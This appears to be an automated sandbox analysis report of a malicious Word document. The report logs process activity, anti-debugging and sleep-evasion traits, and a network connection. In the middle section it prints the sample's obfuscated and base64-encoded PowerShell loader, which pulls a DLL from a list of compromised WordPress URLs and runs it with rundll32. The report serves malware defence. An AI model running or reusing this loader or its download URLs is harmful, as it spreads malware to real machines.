Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F109C FindFirstFileW,

13_2_001F109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,

7_2_100011C0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C4FF mov eax, dword ptr fs:[00000030h]	7_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h]	8_2_0032C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC4FF mov eax, dword ptr fs:[00000030h]	9_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC4FF mov eax, dword ptr fs:[00000030h]	10_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC4FF mov eax, dword ptr fs:[00000030h]	11_2_002EC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C4FF mov eax, dword ptr fs:[00000030h]	12_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FC4FF mov eax, dword ptr fs:[00000030h]	13_2_001FC4FF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10001B30

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 5.2.136.90 80

Jump to behavior

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

